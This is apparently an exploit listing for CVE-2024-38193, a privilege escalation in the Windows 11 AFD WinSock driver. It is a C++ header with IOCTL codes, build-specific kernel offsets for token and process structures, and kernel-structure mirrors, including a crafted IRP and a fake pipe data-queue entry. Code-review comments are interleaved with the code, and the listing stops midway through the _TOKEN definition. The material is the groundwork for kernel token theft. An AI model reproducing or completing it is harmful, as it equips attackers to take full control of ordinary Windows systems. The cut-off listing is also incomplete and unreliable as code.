Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation


# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193

#pragma once

#include "ntstatus.h"
#include "Windows.h"
#include <iostream>

#pragma comment(lib, "ntdll.lib")


// Split a 64-bit value into its high and low 32-bit halves.
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))

// Extended-attribute name carried by the AFD create packet (see _AFD_CREATE_PACKET
// below; 15 characters, matching its EaName[15]), the AFD device path, and the
// loopback address used for the socket setup.
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"


// AFD and named-pipe control codes. Every value carries an LL suffix except
// FSCTL_PIPE_INTERNAL_WRITE; the suffix does not change the numeric value, but
// the odd one out is an inconsistency worth aligning with its neighbours.
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8

// Object-attribute flags, create disposition and the NTSTATUS success test
// (same values as ntdef.h; redefined here because ntdef.h is not included).
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

// Hard-coded kernel structure offsets for one specific Windows build (see the
// "Tested on" line in the header); they are not stable across builds.
// The OFFSET_IN_TOKEN_* values agree with the //0x.. annotations on struct _TOKEN
// below (Privileges 0x40, PrimaryGroup 0xa8, DynamicPart 0xb0, DefaultDacl 0xb8,
// VariablePart 0x490). PREVIOUS_MODE_OFFSET, OFFSET_TO_ACTIVE_PROCESS_LINKS and
// OFFSET_TO_TOKEN refer to structures that are not declared in this file and
// cannot be cross-checked here.
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
// Pseudo-handle for the calling thread ((HANDLE)-2, i.e. NtCurrentThread()).
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE


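// User-mode mirror of the kernel IO_STATUS_BLOCK (0x10 bytes on x64), embedded
// in struct _IRP below as IoStatus.
// The leading `typedef` had no declarator, so the compiler ignored it and warned
// (MSVC C4091); it is dropped here. The type is still usable as IO_STATUS_BLOCK.
// NOTE(review): the documented layout is `NTSTATUS Status` / `ULONG_PTR Information`;
// DWORD and DWORD* have the same width on x64, so the size and offsets match, but
// Information is a byte count, not a pointer, and must not be dereferenced.
struct IO_STATUS_BLOCK
{
    union
    {
        DWORD Status;
        PVOID Pointer;
    };

    DWORD* Information;
};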

//0x4 bytes (sizeof)
// Mirror of the kernel _SYSTEM_POWER_STATE_CONTEXT: a 32-bit bit-field overlaid
// with ContextAsUlong. Referenced only by the Power arm of _IO_STACK_LOCATION.
// The unnamed struct inside the union is a C11 / Microsoft extension.
struct _SYSTEM_POWER_STATE_CONTEXT
{
    union
    {
        struct
        {
            ULONG Reserved1 : 8; //0x0
            ULONG TargetSystemState : 4; //0x0
            ULONG EffectiveSystemState : 4; //0x0
            ULONG CurrentSystemState : 4; //0x0
            ULONG IgnoreHibernationPath : 1; //0x0
            ULONG PseudoTransition : 1; //0x0
            ULONG KernelSoftReboot : 1; //0x0
            ULONG DirectedDripsTransition : 1; //0x0
            ULONG Reserved2 : 8; //0x0
        };
        ULONG ContextAsUlong; //0x0
    };
};

//0x4 bytes (sizeof)
// Mirror of the kernel _POWER_STATE union. The two enum types are not declared in
// this file — presumably they come from Windows.h; verify if this fails to compile.
union _POWER_STATE
{
    enum _SYSTEM_POWER_STATE SystemState; //0x0
    enum _DEVICE_POWER_STATE DeviceState; //0x0
};

//0x48 bytes (sizeof)
// Complete mirror of the kernel IO_STACK_LOCATION for one Windows build. The
// Parameters union reproduces every per-major-function arm even though any one
// request uses a single arm; the //0x.. annotations are the offsets from the
// original symbol dump. Many of the struct types named inside (_IO_SECURITY_CONTEXT,
// _VPB, _FILE_OBJECT, ...) are only ever used through pointers and are never
// defined in this file, which is fine for layout purposes.
// Used by struct mm below (crafted_arbitrary_io_stack_location) and pointed to
// from _IRP::Tail.Overlay.CurrentStackLocation.
typedef struct _IO_STACK_LOCATION
{
    UCHAR MajorFunction; //0x0
    UCHAR MinorFunction; //0x1
    UCHAR Flags; //0x2
    UCHAR Control; //0x3
    union
    {
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT FileAttributes; //0x18
            USHORT ShareAccess; //0x1a
            ULONG EaLength; //0x20
        } Create; //0x8
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
        } CreatePipe; //0x8
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
        } CreateMailslot; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Read; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Write; //0x8
        struct
        {
            ULONG Length; //0x8
            struct _UNICODE_STRING* FileName; //0x10
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
            ULONG FileIndex; //0x20
        } QueryDirectory; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
        } NotifyDirectory; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
            enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
DirectoryNotifyInformationClass; //0x18
        } NotifyDirectoryEx; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
        } QueryFile; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
            struct _FILE_OBJECT* FileObject; //0x18
            union
            {
                struct
                {
                    UCHAR ReplaceIfExists; //0x20
                    UCHAR AdvanceOnly; //0x21
                };
                ULONG ClusterCount; //0x20
                VOID* DeleteHandle; //0x20
            };
        } SetFile; //0x8
        struct
        {
            ULONG Length; //0x8
            VOID* EaList; //0x10
            ULONG EaListLength; //0x18
            ULONG EaIndex; //0x20
        } QueryEa; //0x8
        struct
        {
            ULONG Length; //0x8
        } SetEa; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } QueryVolume; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } SetVolume; //0x8
        struct
        {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG FsControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } FileSystemControl; //0x8
        struct
        {
            union _LARGE_INTEGER* Length; //0x8
            ULONG Key; //0x10
            union _LARGE_INTEGER ByteOffset; //0x18
        } LockControl; //0x8
        struct
        {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG IoControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } DeviceIoControl; //0x8
        struct
        {
            ULONG SecurityInformation; //0x8
            ULONG Length; //0x10
        } QuerySecurity; //0x8
        struct
        {
            ULONG SecurityInformation; //0x8
            VOID* SecurityDescriptor; //0x10
        } SetSecurity; //0x8
        struct
        {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } MountVolume; //0x8
        struct
        {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } VerifyVolume; //0x8
        struct
        {
            struct _SCSI_REQUEST_BLOCK* Srb; //0x8
        } Scsi; //0x8
        struct
        {
            ULONG Length; //0x8
            VOID* StartSid; //0x10
            struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
            ULONG SidListLength; //0x20
        } QueryQuota; //0x8
        struct
        {
            ULONG Length; //0x8
        } SetQuota; //0x8
        struct
        {
            enum _DEVICE_RELATION_TYPE Type; //0x8
        } QueryDeviceRelations; //0x8
        struct
        {
            struct _GUID* InterfaceType; //0x8
            USHORT Size; //0x10
            USHORT Version; //0x12
            struct _INTERFACE* Interface; //0x18
            VOID* InterfaceSpecificData; //0x20
        } QueryInterface; //0x8
        struct
        {
            struct _DEVICE_CAPABILITIES* Capabilities; //0x8
        } DeviceCapabilities; //0x8
        struct
        {
            struct _IO_RESOURCE_REQUIREMENTS_LIST*
IoResourceRequirementList; //0x8
        } FilterResourceRequirements; //0x8
        struct
        {
            ULONG WhichSpace; //0x8
            VOID* Buffer; //0x10
            ULONG Offset; //0x18
            ULONG Length; //0x20
        } ReadWriteConfig; //0x8
        struct
        {
            UCHAR Lock; //0x8
        } SetLock; //0x8
        struct
        {
            enum BUS_QUERY_ID_TYPE IdType; //0x8
        } QueryId; //0x8
        struct
        {
            enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
            ULONG LocaleId; //0x10
        } QueryDeviceText; //0x8
        struct
        {
            UCHAR InPath; //0x8
            UCHAR Reserved[3]; //0x9
            enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
        } UsageNotification; //0x8
        struct
        {
            enum _SYSTEM_POWER_STATE PowerState; //0x8
        } WaitWake; //0x8
        struct
        {
            struct _POWER_SEQUENCE* PowerSequence; //0x8
        } PowerSequence; //0x8
        struct
        {
            union
            {
                ULONG SystemContext; //0x8
                struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
//0x8
            };
            enum _POWER_STATE_TYPE Type; //0x10
            union _POWER_STATE State; //0x18
            enum POWER_ACTION ShutdownType; //0x20
        } Power; //0x8
        struct
        {
            struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
            struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
        } StartDevice; //0x8
        struct
        {
            ULONGLONG ProviderId; //0x8
            VOID* DataPath; //0x10
            ULONG BufferSize; //0x18
            VOID* Buffer; //0x20
        } WMI; //0x8
        struct
        {
            VOID* Argument1; //0x8
            VOID* Argument2; //0x10
            VOID* Argument3; //0x18
            VOID* Argument4; //0x20
        } Others; //0x8
    } Parameters; //0x8
    struct _DEVICE_OBJECT* DeviceObject; //0x28
    struct _FILE_OBJECT* FileObject; //0x30
    // Completion callback; the parameter list is split across two lines in the
    // original listing (a wrapping artifact), which is still legal code.
    LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
arg2, VOID* arg3); //0x38
    VOID* Context; //0x40
}IO_STACK_LOCATION;

//0x18 bytes (sizeof)
// Mirror of the kernel _KDEVICE_QUEUE_ENTRY; embedded in _IRP::Tail.Overlay.
struct _KDEVICE_QUEUE_ENTRY
{
    struct _LIST_ENTRY DeviceListEntry; //0x0
    ULONG SortKey; //0x10
    UCHAR Inserted; //0x14
};

//0x58 bytes (sizeof)
// Mirror of the kernel _KAPC; embedded in _IRP::Tail as the Apc arm of the union.
// Only the layout matters here, so the pointed-to _KTHREAD is never defined.
struct _KAPC
{
    UCHAR Type; //0x0
    UCHAR AllFlags; //0x1
    UCHAR Size; //0x2
    UCHAR SpareByte1; //0x3
    ULONG SpareLong0; //0x4
    struct _KTHREAD* Thread; //0x8
    struct _LIST_ENTRY ApcListEntry; //0x10
    VOID* Reserved[3]; //0x20
    VOID* NormalContext; //0x38
    VOID* SystemArgument1; //0x40
    VOID* SystemArgument2; //0x48
    CHAR ApcStateIndex; //0x50
    CHAR ApcMode; //0x51
    UCHAR Inserted; //0x52
};
//0xd0 bytes (sizeof)
// Mirror of the kernel _IRP for one Windows build; struct mm below holds one as
// crafted_irp. Offsets are the //0x.. annotations from the original symbol dump.
// NOTE(review): IoStatus (0x30) uses this file's own `struct IO_STATUS_BLOCK`,
// while UserIosb (0x48) points at a differently tagged `struct _IO_STATUS_BLOCK`
// that is never defined here. A pointer to an incomplete type compiles fine, but
// the two tags are distinct types and the inconsistency is worth tidying.
struct _IRP
{
    SHORT Type; //0x0
    USHORT Size; //0x2
    USHORT AllocationProcessorNumber; //0x4
    USHORT Reserved; //0x6
    struct _MDL* MdlAddress; //0x8
    ULONG Flags; //0x10
    union
    {
        struct _IRP* MasterIrp; //0x18
        LONG IrpCount; //0x18
        VOID* SystemBuffer; //0x18
    } AssociatedIrp; //0x18
    struct _LIST_ENTRY ThreadListEntry; //0x20
    struct IO_STATUS_BLOCK IoStatus; //0x30
    CHAR RequestorMode; //0x40
    UCHAR PendingReturned; //0x41
    CHAR StackCount; //0x42
    CHAR CurrentLocation; //0x43
    UCHAR Cancel; //0x44
    UCHAR CancelIrql; //0x45
    CHAR ApcEnvironment; //0x46
    UCHAR AllocationFlags; //0x47
    union
    {
        struct _IO_STATUS_BLOCK* UserIosb; //0x48
        VOID* IoRingContext; //0x48
    };
    struct _KEVENT* UserEvent; //0x50
    union
    {
        struct
        {
            union
            {
                // Parameter list wrapped onto two lines in the original listing.
                VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
arg2, ULONG arg3); //0x58
                VOID* IssuingProcess; //0x58
            };
            union
            {
                VOID* UserApcContext; //0x60
                struct _IORING_OBJECT* IoRing; //0x60
            };
        } AsynchronousParameters; //0x58
        union _LARGE_INTEGER AllocationSize; //0x58
    } Overlay; //0x58
    VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
//0x68
    VOID* UserBuffer; //0x70
    union
    {
        struct
        {
            union
            {
                struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
                VOID* DriverContext[4]; //0x78
            };
            struct _ETHREAD* Thread; //0x98
            CHAR* AuxiliaryBuffer; //0xa0
            struct _LIST_ENTRY ListEntry; //0xa8
            union
            {
                struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
                ULONG PacketType; //0xb8
            };
            struct _FILE_OBJECT* OriginalFileObject; //0xc0
            VOID* IrpExtension; //0xc8
        } Overlay; //0x78
        struct _KAPC Apc; //0x78
        VOID* CompletionKey; //0x78
    } Tail; //0x78
};
// TDI transport address: a type tag plus a variable-length address body.
// Address[1] is the pre-C99 flexible-array idiom; the real payload is
// AddressLength bytes long and extends past the end of the struct.
typedef struct _TA_ADDRESS
{
    USHORT AddressLength;
    USHORT AddressType;
    UCHAR Address[1];
}TA_ADDRESS;

// TDI TRANSPORT_ADDRESS header: a count followed by TAAddressCount TA_ADDRESS
// records. Address[1] is a placeholder for the variable-length tail.
typedef struct _TRANSPORT_ADDRESS
{
    LONG TAAddressCount;
    TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;

// Native UNICODE_STRING (as in winternl.h / ntdef.h, neither of which is
// included). Length and MaximumLength are byte counts, not character counts.
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

// Native OBJECT_ATTRIBUTES passed to Nt* open/create calls. Length must be set
// to sizeof(OBJECT_ATTRIBUTES); Attributes takes the OBJ_* flags defined above.
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

// One loaded-module record as returned by NtQuerySystemInformation with
// SystemModuleInformation (see enum SYSTEM_INFORMATION_CLASS below).
// FullPathName is NUL-terminated ANSI; OffsetToFileName indexes into it.
typedef struct _SYSTEM_MODULE_ENTRY
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;

// SystemModuleInformation result buffer: Count entries follow the header.
// Module[1] is a placeholder for the variable-length array; callers must size
// the allocation from Count (or the ReturnLength of the query), not sizeof.
typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG Count;
    SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

// One handle record from NtQuerySystemInformation(SystemExtendedHandleInformation).
// Object is the kernel address of the referenced object; HandleValue is the
// user-mode handle in process UniqueProcessId.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
    PVOID Object;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR HandleValue;
    ULONG GrantedAccess;
    USHORT CreatorBackTraceIndex;
    USHORT ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

// SystemExtendedHandleInformation result buffer: NumberOfHandles entries follow
// the header. Handles[1] is a placeholder for the variable-length array, so the
// buffer must be sized from the query's ReturnLength rather than sizeof.
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;

// Extended-attribute buffer handed to the \Device\Afd open: a FILE_FULL_EA_INFORMATION
// header whose EA name is AfdOpenPacket (15 chars, hence EaName[15]) followed by
// the AFD create packet that forms the EA value.
// NOTE(review): the NUL that must terminate EaName is not part of the array; it
// lands in the alignment padding before EndpointFlags, so this relies on the
// struct being zero-initialized before use — confirm at the call site.
typedef struct _AFD_CREATE_PACKET {
    //FILE_FULL_EA_INFORMATION
    ULONG NextEntryOffset;
    WORD Flags;
    UCHAR EaNameLength;
    USHORT EaValueLength;
    CHAR EaName[15];

    //AFD_CREATE_PACKET
    ULONG EndpointFlags;
    ULONG GroupID;
    ULONG AddressFamily;
    ULONG SocketType;
    ULONG Protocol;
    ULONG SizeOfTransportName;
    wchar_t TransportName[16];
    //UCHAR Unkown;
} AFD_CREATE_PACKET;

// Subset of the native THREADINFOCLASS needed here (NtSetInformationThread class 5).
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };

// Subset of the native SYSTEM_INFORMATION_CLASS used with NtQuerySystemInformation;
// the result layouts are _SYSTEM_MODULE_INFORMATION and
// _SYSTEM_HANDLE_INFORMATION_EX above.
enum SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemExtendedHandleInformation = 64
};

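// Event kinds accepted by NtCreateEvent. The original `typedef` had no declarator
// and was silently ignored by the compiler (MSVC warns with C4091); in C++ the
// enum name is already a type, so the keyword is simply dropped.
enum EVENT_TYPE {
    NotificationEvent,
    SynchronizationEvent
};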

// Input buffer for IOCTL_AFD_BIND: share mode followed by the IPv4 socket address.
typedef struct _AFD_BIND_DATA {
    ULONG ShareType;
    SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;

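// Input buffer for IOCTL_AFD_CONNECT, 16-byte aligned. Field names with "Unknown"
// / "tmp" / "const_16" reflect that the meaning of those slots was not recovered;
// the `bind` member is the target sockaddr_in (the name shadows the Winsock
// function but is legal).
// The original `typedef` had no declarator and was ignored with a warning
// (MSVC C4091); it is dropped here, which changes nothing for C++ callers.
struct alignas(16) MY_AFD_CONNECT_INFO
{
    __int64 UseSan;
    __int64 hNtSock1;
    __int64 Unknown;
    __int32 tmp6;
    WORD const_16;
    sockaddr_in bind;
};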


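// Crafted named-pipe data-queue entry; struct mm below keeps one as fake_data_entry.
// DATA is 0x77FD0 bytes (~480 KiB), so instances must live on the heap, not the
// stack. LIST_ENTRY is the Windows.h type.
// The original `typedef` had no declarator and was ignored with a warning
// (MSVC C4091); it is dropped here.
struct FAKE_DATA_ENTRY_QUEUE
{
    DWORD tmp;
    LIST_ENTRY nextQueue;
    __int64 unknown;
    PVOID security_client_context;
    __int64 unknown2;
    __int64 sizeOfData;
    char DATA[0x77FD0];
};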

// Input buffer for IOCTL_AFD_LISTEN. The first ULONG is padded to 8 bytes before
// MaximumConnectionQueue (the backlog).
typedef struct _AFD_LISTEN_INFO {

    ULONG unknown;
    __int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;






// Mirror of the kernel SECURITY_CLIENT_CONTEXT (the impersonation context a
// server captures with SeCreateClientSecurity). _SECURITY_QUALITY_OF_SERVICE
// and _TOKEN_CONTROL come from Windows.h; ClientToken is a kernel pointer.
typedef struct _SECURITY_CLIENT_CONTEXT
{
    _SECURITY_QUALITY_OF_SERVICE SecurityQos;
    void* ClientToken;
    unsigned __int8 DirectlyAccessClientToken;
    unsigned __int8 DirectAccessEffectiveOnly;
    unsigned __int8 ServerIsRemote;
    _TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;

// Mirror of the kernel _OWNER_ENTRY (0x10 bytes) used by _ERESOURCE below.
// The second member is a union of count/flags in the real type; only its size
// matters here. Its name `___u1` starts with underscores and is therefore a
// reserved identifier — harmless in practice, but worth renaming.
struct __declspec(align(8)) _OWNER_ENTRY
{
    unsigned __int64 OwnerThread;
    DWORD ___u1;
};


//0x68 bytes (sizeof)
// Mirror of the kernel ERESOURCE reader/writer lock; _TOKEN::TokenLock points at
// one, and struct mm below keeps a copy as TokenLock.
typedef struct _ERESOURCE
{
    struct _LIST_ENTRY SystemResourcesList; //0x0
    struct _OWNER_ENTRY* OwnerTable; //0x10
    SHORT ActiveCount; //0x18
    union
    {
        USHORT Flag; //0x1a
        struct
        {
            UCHAR ReservedLowFlags; //0x1a
            UCHAR WaiterPriority; //0x1b
        };
    };
    VOID* SharedWaiters; //0x20
    VOID* ExclusiveWaiters; //0x28
    struct _OWNER_ENTRY OwnerEntry; //0x30
    ULONG ActiveEntries; //0x40
    ULONG ContentionCount; //0x44
    ULONG NumberOfSharedWaiters; //0x48
    ULONG NumberOfExclusiveWaiters; //0x4c
    VOID* Reserved2; //0x50
    union
    {
        VOID* Address; //0x58
        ULONGLONG CreatorBackTraceIndex; //0x58
    };
    ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;

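//0x8 bytes (sizeof)
// Mirror of the kernel EX_PUSH_LOCK: one pointer-sized word viewed as flag bits,
// a raw value, or a pointer. Embedded in _SEP_CACHED_HANDLES_TABLE,
// _OB_HANDLE_REVOCATION_BLOCK, _SEP_LOGON_SESSION_REFERENCES and _OBJECT_HEADER.
// The original `typedef` had no declarator and was ignored with a warning
// (MSVC C4091); it is dropped here.
struct _EX_PUSH_LOCK
{
    union
    {
        struct
        {
            ULONGLONG Locked : 1; //0x0
            ULONGLONG Waiting : 1; //0x0
            ULONGLONG Waking : 1; //0x0
            ULONGLONG MultipleShared : 1; //0x0
            ULONGLONG Shared : 60; //0x0
        };
        ULONGLONG Value; //0x0
        VOID* Ptr; //0x0
    };
};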

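//0x10 bytes (sizeof)
// Mirror of the kernel _SEP_CACHED_HANDLES_TABLE; embedded in
// _SEP_LOGON_SESSION_REFERENCES. The hash table is only referenced by pointer.
// The original `typedef` had no declarator and was ignored with a warning
// (MSVC C4091); it is dropped here.
struct _SEP_CACHED_HANDLES_TABLE
{
    struct _EX_PUSH_LOCK Lock; //0x0
    struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};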

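//0x8 bytes (sizeof)
// Mirror of the kernel EX_RUNDOWN_REF: a single word that is either a reference
// count or, once rundown starts, a pointer. Embedded in _OB_HANDLE_REVOCATION_BLOCK.
// The original `typedef` had no declarator and was ignored with a warning
// (MSVC C4091); it is dropped here.
struct _EX_RUNDOWN_REF
{
    union
    {
        ULONGLONG Count; //0x0
        VOID* Ptr; //0x0
    };
};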

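//0x20 bytes (sizeof)
// Mirror of the kernel _OB_HANDLE_REVOCATION_BLOCK; embedded in
// _SEP_LOGON_SESSION_REFERENCES at 0x80.
// The original `typedef` had no declarator and was ignored with a warning
// (MSVC C4091); it is dropped here.
struct _OB_HANDLE_REVOCATION_BLOCK
{
    struct _LIST_ENTRY RevocationInfos; //0x0
    struct _EX_PUSH_LOCK Lock; //0x10
    struct _EX_RUNDOWN_REF Rundown; //0x18
};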

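//0xc0 bytes (sizeof)
// Mirror of the kernel _SEP_LOGON_SESSION_REFERENCES for one Windows build;
// _TOKEN::LogonSession points at one and struct mm below keeps a copy as
// LogonSession. The offsets are the //0x.. annotations from the symbol dump and
// are build-specific.
// The original `typedef` had no declarator and was ignored with a warning
// (MSVC C4091); it is dropped here.
struct _SEP_LOGON_SESSION_REFERENCES
{
    struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
    struct _LUID LogonId; //0x8
    struct _LUID BuddyLogonId; //0x10
    LONGLONG ReferenceCount; //0x18
    ULONG Flags; //0x20
    struct _DEVICE_MAP* pDeviceMap; //0x28
    VOID* Token; //0x30
    struct _UNICODE_STRING AccountName; //0x38
    struct _UNICODE_STRING AuthorityName; //0x48
    struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
    struct _EX_PUSH_LOCK SharedDataLock; //0x68
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes; //0x70
    struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
    struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
    struct _EJOB* ServerSilo; //0xa0
    struct _LUID SiblingAuthId; //0xa8
    struct _LIST_ENTRY TokenList; //0xb0
};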
//0x30 bytes (sizeof)
// Mirror of the kernel _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION; pointed to by
// _TOKEN::pSecurityAttributes and kept in struct mm as pSecurityAttributes.
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
    ULONG SecurityAttributeCount; //0x0
    struct _LIST_ENTRY SecurityAttributesList; //0x8
    ULONG WorkingSecurityAttributeCount; //0x18
    struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;

//0x20 bytes (sizeof)
// Mirror of the kernel _SEP_SID_VALUES_BLOCK header; the SID data follows the
// header and SidValuesStart gives its offset. Pointed to by _TOKEN::TokenSidValues.
typedef struct _SEP_SID_VALUES_BLOCK
{
    ULONG BlockLength; //0x0
    LONGLONG ReferenceCount; //0x8
    ULONG SidCount; //0x10
    ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;

//0x18 bytes (sizeof)
// Mirror of the kernel _SEP_TOKEN_PRIVILEGES: three 64-bit privilege bitmasks.
// Embedded in _TOKEN at 0x40 (OFFSET_IN_TOKEN_TOKEN_PRIVILEGES above).
struct _SEP_TOKEN_PRIVILEGES
{
    ULONGLONG Present; //0x0
    ULONGLONG Enabled; //0x8
    ULONGLONG EnabledByDefault; //0x10
};

//0x1f bytes (sizeof)
// Mirror of the kernel _SEP_AUDIT_POLICY; embedded in _TOKEN at 0x58.
// _TOKEN_AUDIT_POLICY is expected from Windows.h.
struct _SEP_AUDIT_POLICY
{
    struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
    UCHAR PolicySetStatus; //0x1e
};

//0x498 bytes (sizeof)
// Mirror of the kernel _TOKEN object body for one Windows build. The //0x..
// annotations are the offsets the OFFSET_IN_TOKEN_* macros at the top of the
// file encode (Privileges 0x40, PrimaryGroup 0xa8, DynamicPart 0xb0,
// DefaultDacl 0xb8, VariablePart 0x490); both must be updated together when the
// target build changes. Embedded as Body in _OBJECT_HEADER below and kept in
// struct mm as fakeToken.
struct _TOKEN
{
    struct _TOKEN_SOURCE TokenSource; //0x0
    struct _LUID TokenId; //0x10
    struct _LUID AuthenticationId; //0x18
    struct _LUID ParentTokenId; //0x20
    union _LARGE_INTEGER ExpirationTime; //0x28
    struct _ERESOURCE* TokenLock; //0x30
    struct _LUID ModifiedId; //0x38
    struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
    struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
    ULONG SessionId; //0x78
    ULONG UserAndGroupCount; //0x7c
    ULONG RestrictedSidCount; //0x80
    ULONG VariableLength; //0x84
    ULONG DynamicCharged; //0x88
    ULONG DynamicAvailable; //0x8c
    ULONG DefaultOwnerIndex; //0x90
    struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
